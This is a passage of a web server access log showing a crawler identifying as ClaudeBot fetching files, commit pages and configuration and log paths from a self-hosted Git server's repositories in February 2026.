3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 10315] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log?display=source" [Client 216.73.216.188] [Length 19752] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 216.73.216.188] [Length 11568] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log?display=source" [Client 216.73.216.188] [Length 12869] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" [Client 216.73.216.188] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 216.73.216.188] [Length 10988] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 216.73.216.188] [Length 48879] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 216.73.216.188] [Length 11357] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log?display=rendered" [Client 216.73.216.188] [Length 10978] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9790] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log?display=source" [Client 216.73.216.188] [Length 20597] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 216.73.216.188] [Length 11547] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 10162] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 216.73.216.188] [Length 10528] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log?display=source" [Client 216.73.216.188] [Length 14422] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css/style.css" [Client 216.73.216.188] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf?display=source" [Client 216.73.216.188] [Length 11677] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 10073] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 216.73.216.188] [Length 7506] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 20745] [Gzip 9.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 216.73.216.188] [Length 11560] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 1442] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10992] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 216.73.216.188] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html?display=source" [Client 216.73.216.188] [Length 34410] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 216.73.216.188] [Length 16072] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 216.73.216.188] [Length 11269] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 9851] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 20146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 42631] [Gzip 12.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" [Client 216.73.216.188] [Length 11018] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 122521] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 13851] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json?display=source" [Client 216.73.216.188] [Length 11035] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate?display=source" [Client 216.73.216.188] [Length 13023] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 216.73.216.188] [Length 11029] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 10174] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 10315] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 216.73.216.188] [Length 10846] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12603] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log?display=source" [Client 216.73.216.188] [Length 11415] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 216.73.216.188] [Length 11581] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf?display=source" [Client 216.73.216.188] [Length 13015] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 216.73.216.188] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 216.73.216.188] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 24951] [Gzip 10.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10878] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 14319] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 